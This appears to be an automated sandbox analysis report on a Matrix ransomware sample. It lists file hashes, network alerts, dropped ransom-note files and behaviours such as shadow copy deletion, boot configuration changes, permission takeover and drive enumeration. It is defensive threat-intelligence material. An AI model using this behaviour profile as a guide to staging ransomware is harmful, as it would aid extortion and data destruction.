Analysis
-
max time kernel
150s -
max time network
119s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
06-03-2022 03:26
Static task
static1
Behavioral task
behavioral1
Sample
e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe
Resource
win10v2004-en-20220113
General
-
Target
e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe
-
Size
3.8MB
-
MD5
6fa2ff1dad01f838e0bb814affccd0c6
-
SHA1
8c26dfd9d19c3b45cd057f895f80d43326fc986d
-
SHA256
e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c
-
SHA512
de88757ee96943eaec582760b1631befb09ea8b9a5c8c757e24431978e3338ea7dd922e2b3dd1a47e514bb0ea93252171236f817c4d1220794e9472c8c2f24d3
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
Processes:
e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exereg.exedescription ioc Process File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jre7\lib\ext\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_filter\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Microsoft Games\Purble Place\fr-FR\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\plugins\codec\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ZZZ3YRT4\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\Downloads\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Google\Chrome\Application\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Microsoft Games\Multiplayer\Backgammon\fr-FR\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\index-dir\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Microsoft Games\Hearts\de-DE\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Microsoft Games\More Games\en-US\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\ProgramData\Microsoft\Assistance\Client\1.0\de-DE\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Microsoft Games\SpiderSolitaire\de-DE\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Public\Libraries\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Microsoft Games\Mahjong\de-DE\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Microsoft Games\Mahjong\es-ES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\skins\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe -
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid Process 1980 bcdedit.exe 1768 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 9 1712 powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
rhcykjvj64.exedescription ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS rhcykjvj64.exe -
Executes dropped EXE 3 IoCs
Processes:
NWvty47c.exerhcykjvj.exerhcykjvj64.exepid Process 776 NWvty47c.exe 1020 rhcykjvj.exe 276 rhcykjvj64.exe -
Sets service image path in registry 2 TTPs
-
Processes:
resource yara_rule behavioral1/files/0x000600000001337b-71.dat upx behavioral1/files/0x000600000001337b-72.dat upx behavioral1/files/0x000600000001337b-73.dat upx -
Loads dropped DLL 4 IoCs
Processes:
e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.execmd.exerhcykjvj.exepid Process 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 1060 cmd.exe 1020 rhcykjvj.exe -
Modifies file permissions 1 TTPs 1 IoCs
Processes:
takeown.exepid Process 2012 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 40 IoCs
Processes:
e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exedescription ioc Process File opened for modification C:\Program Files (x86)\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\Videos\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Searches\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\Downloads\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\Libraries\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\H2R8HLJC\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Links\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\Desktop\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\Documents\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\E16QEJ8K\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Music\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\Pictures\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\VL9MRVWS\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\Music\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ZZZ3YRT4\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Videos\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Documents\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rhcykjvj64.exee6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exedescription ioc Process File opened (read-only) \??\Q: rhcykjvj64.exe File opened (read-only) \??\Y: rhcykjvj64.exe File opened (read-only) \??\Y: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\V: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\N: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\M: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\O: rhcykjvj64.exe File opened (read-only) \??\P: rhcykjvj64.exe File opened (read-only) \??\Z: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\X: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\T: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\G: rhcykjvj64.exe File opened (read-only) \??\N: rhcykjvj64.exe File opened (read-only) \??\S: rhcykjvj64.exe File opened (read-only) \??\T: rhcykjvj64.exe File opened (read-only) \??\S: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\R: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\O: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\G: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\B: rhcykjvj64.exe File opened (read-only) \??\M: rhcykjvj64.exe File opened (read-only) \??\E: rhcykjvj64.exe File opened (read-only) \??\H: rhcykjvj64.exe File opened (read-only) \??\R: rhcykjvj64.exe File opened (read-only) \??\U: rhcykjvj64.exe File opened (read-only) \??\W: rhcykjvj64.exe File opened (read-only) \??\X: rhcykjvj64.exe File opened (read-only) \??\K: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\J: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\I: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\H: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\F: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\F: rhcykjvj64.exe File opened (read-only) \??\W: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\P: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\L: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\K: rhcykjvj64.exe File opened (read-only) \??\L: rhcykjvj64.exe File opened (read-only) \??\Z: rhcykjvj64.exe File opened (read-only) \??\U: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\A: rhcykjvj64.exe File opened (read-only) \??\I: rhcykjvj64.exe File opened (read-only) \??\Q: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\E: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\J: rhcykjvj64.exe File opened (read-only) \??\V: rhcykjvj64.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 8 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\nDCJa1RD.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
Processes:
e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exedescription ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sa.xml e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Choibalsan e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_es.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\default.jfc e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\sv.pak e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Bermuda e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\conticon.gif e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Tallinn e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kosrae e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\MountRepair.ex_ e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-11 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.lnk e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libkaraoke_plugin.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.zh_CN_5.5.0.165303.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Mozilla Firefox\uninstall\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\plugins\access_output\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker_1.1.200.v20131119-0908.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-io-ui.xml e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Mozilla Firefox\default-browser-agent.exe e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\simplexml.luac e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\mux\libmux_dummy_plugin.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Enderbury e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_ja.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Prague e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Bangkok e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program 